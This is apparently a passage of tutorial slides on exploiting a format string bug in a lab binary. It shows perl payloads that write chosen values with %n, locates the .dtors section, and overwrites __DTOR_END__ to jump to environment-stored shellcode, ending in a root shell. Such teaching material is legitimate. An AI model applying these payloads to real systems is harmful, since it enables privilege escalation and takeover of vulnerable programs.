  • 32. Format Strings : Overwriting Value Testing the code: #./format_string `perl -e 'print "x3cxe8xbfxbfJUNKx3dxe8xbfxbfJUNKx3exe8xbfxbfJUNKx3fxe8xbfxbfJUNK" . "%08x"x10 . "%58x %n%08x%n"'` < JUNK= JUNK> JUNK? JUNKbfbfed68000003ff000000000000000000000000bfbfea1c28077000000000032807604000000000 ffffffb84b4e554a [*] test_val @ 0xbfbfe83c = 45738 0x0000b2aa # #gdb -q (gdb) p 0xbb - 0xaa $1 = 17 #./format_string `perl -e 'print "x3cxe8xbfxbfJUNKx3dxe8xbfxbfJUNKx3exe8xbfxbfJUNKx3fxe8xbfxbfJUNK" . "%08x"x10 . "%58x %n%17x%n"'` < JUNK= JUNK> JUNK? JUNKbfbfed68000003ff000000000000000000000000bfbfea1c28077000000000032807604000000000 ffffffb8 4b4e554a [*] test_val @ 0xbfbfe83c = 48042 0x0000bbaa # #./format_string `perl -e 'print "x2cxe8xbfxbfJUNKx2dxe8xbfxbfJUNKx2exe8xbfxbfJUNKx2fxe8xbfxbfJUNK" . "%08x"x10 . "%58x %n%17x%n%17x%n%17x%n"'` , JUNK- JUNK. JUNK/ JUNKbfbfed5c000003ff000000000000000000000000bfbfea0c28077000000000032807604000000000 ffffffb8 4b4e554a 4b4e554a 4b4e554a [*] test_val @ 0xbfbfe82c = -573785174 0xddccbbaa #
  • 33. Format Strings : What we know • So, we can now write whatever value we want to whatever memory address. • So why dont we just overwrite the saved EIP? • We could, but I wanted to introduce another section that makes it much easier. • The way to now gain control of program flow, is to add a value to something called .dtors.
  • 34. WTF is .dtors? format_string: • When writing a program, you #nm ./format_string 080495f4 D _DYNAMIC can create functions that run 080496b8 D _GLOBAL_OFFSET_TABLE_ w _Jv_RegisterClasses either before the start of the 080496a8 d __CTOR_END__ main program, or after the 080496a4 d __CTOR_LIST__ 080496b0 d __DTOR_END__ end of the program. 080496ac d __DTOR_LIST__ 080495f0 r __EH_FRAME_BEGIN__ • These are called constructors 080495f0 r __FRAME_END__ 080496b4 d __JCR_END__ and destructors, and are put 080496b4 d __JCR_LIST__ into the section of the code 080496d8 A __bss_start # called .ctors and .dtors #objdump -s -j .dtors ./format_string respectively. Contents of section .dtors: 80496ac ffffffff 00000000 ........
  • 35. .dtors : Cont .dtors section: 080496b0 d __DTOR_END__ = 0x00000000 080496ac d __DTOR_LIST__ = 0xffffffff • The .dtors section is writable, so we can overwrite whatever value we want into the addresses. • So all we have to do is get the address of our shellcode. • Change the address we want to overwrite (__DTOR_END__) to contain that of our shellcode, and bobs our uncle.
  • 36. Format String : Exploited Testing the code: #./getenvaddr SHELLCODE ./format_string SHELLCODE will be at 0xbfbfef51 # #./format_string `perl -e 'print "xbcxe7xbfxbfJUNKxbdxe7xbfxbfJUNKxbexe7xbfxbfJUNKxbfxe7xbfxbfJUNK" . "%08x"x10 . "%17x %n%110x%n%208x%n%256x%n"'` ? JUNK? JUNK? JUNK? JUNKbfbfecf4000003ff000000000000000000000000bfbfe99c2807c000000000032807622000000000 ffffffb8 4b4e554a 4b4e554a 4b4e554a [*] test_val @ 0xbfbfe7bc = -1077940351 0xbfbfef81 # #whoami tritured # #./format_string `perl -e 'print "xb0x96x04x08JUNKxb1x96x04x08JUNKxb2x96x04x08JUNKxb3x96x04x08JUNK" . "%08x"x10 . "%17x%n%110x%n%208x%n%256x%n"'` ?JUNK?JUNK?JUNK?JUNKbfbfecf4000003ff000000000000000000000000bfbfe99c2807c000000000032807622000000000 ffffffb8 4b4e554a 4b4e554a 4b4e554a [*] test_val @ 0xbfbfe7bc = -72 0xffffffb8 # whoami root #
  • 37. GG WP